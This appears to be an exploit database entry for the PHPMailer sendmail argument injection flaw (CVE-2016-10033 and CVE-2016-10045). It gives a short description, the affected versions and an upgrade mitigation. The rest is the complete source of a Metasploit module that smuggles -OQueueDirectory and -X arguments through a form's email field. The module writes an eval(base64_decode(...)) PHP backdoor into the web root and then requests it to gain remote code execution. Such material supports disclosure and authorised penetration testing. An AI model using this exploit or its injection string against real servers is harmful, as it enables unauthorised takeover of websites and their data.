PHPMailer Sendmail Argument Injection

vendor:

PHPMailer

by:

Dawid Golunski and Spencer McIntyre

9,8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: PHPMailer

Affected Version From: PHPMailer <5.2.18

Affected Version To: PHPMailer 5.2.18 - 5.2.19

Patch Exists: YES

Related CWE: CVE-2016-10033, CVE-2016-10045

CPE: none

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2016

PHPMailer Sendmail Argument Injection

PHPMailer versions up to and including 5.2.19 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module writes a payload to the web root of the webserver before then executing it with an HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful exploitation can take a few minutes.

Mitigation:

Upgrade to PHPMailer version 5.2.20 or later.

Source

Exploit-DB raw data:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHPMailer Sendmail Argument Injection',
      'Description'    => %q{
        PHPMailer versions up to and including 5.2.19 are affected by a
        vulnerability which can be leveraged by an attacker to write a file with
        partially controlled contents to an arbitrary location through injection
        of arguments that are passed to the sendmail binary. This module
        writes a payload to the web root of the webserver before then executing
        it with an HTTP request. The user running PHPMailer must have write
        access to the specified WEB_ROOT directory and successful exploitation
        can take a few minutes.
      },
      'Author'         => [
        'Dawid Golunski',   # vulnerability discovery and original PoC
        'Spencer McIntyre'  # metasploit module
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2016-10033'],
        ['CVE', '2016-10045'],
        ['EDB', '40968'],
        ['EDB', '40969'],
        ['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'],
        ['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html']
      ],
      'DisclosureDate' => 'Dec 26 2016',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Payload'        => {'DisableNops' => true},
      'Targets'        => [
        ['PHPMailer <5.2.18', {}],
        ['PHPMailer 5.2.18 - 5.2.19', {}]
      ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI',  [true, 'Path to the application root', '/']),
        OptString.new('TRIGGERURI', [false, 'Path to the uploaded payload', '']),
        OptString.new('WEB_ROOT',   [true, 'Path to the web root', '/var/www'])
      ], self.class)
    register_advanced_options(
      [
        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
      ], self.class)
  end

  def trigger(trigger_uri)
    print_status("Sleeping before requesting the payload from: #{trigger_uri}")

    page_found = false
    sleep_time = 10
    wait_time = datastore['WAIT_TIMEOUT']
    print_status("Waiting for up to #{wait_time} seconds to trigger the payload")
    while wait_time > 0
      sleep(sleep_time)
      wait_time -= sleep_time
      res = send_request_cgi(
        'method'   => 'GET',
        'uri'      => trigger_uri
      )

      if res.nil?
        if page_found or session_created?
          print_good('Successfully triggered the payload')
          break
        end

        next
      end

      next unless res.code == 200

      if res.body.length == 0 and not page_found
        print_good('Successfully found the payload')
        page_found = true
      end
    end
  end

  def exploit
    payload_file_name = "#{rand_text_alphanumeric(8)}.php"
    payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"

    if target.name == 'PHPMailer <5.2.18'
      email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
    elsif target.name == 'PHPMailer 5.2.18 - 5.2.19'
      email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
    else
      fail_with(Failure::NoTarget, 'The specified version is not supported')
    end

    data = Rex::MIME::Message.new
    data.add_part('submit', nil, nil, 'form-data; name="action"')
    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
    data.add_part(email, nil, nil, 'form-data; name="email"')
    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')

    print_status("Writing the backdoor to #{payload_file_path}")
    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s
    )

    register_files_for_cleanup(payload_file_path)

    trigger(normalize_uri(datastore['TRIGGERURI'].blank? ? target_uri : datastore['TRIGGERURI'], payload_file_name))
  end
end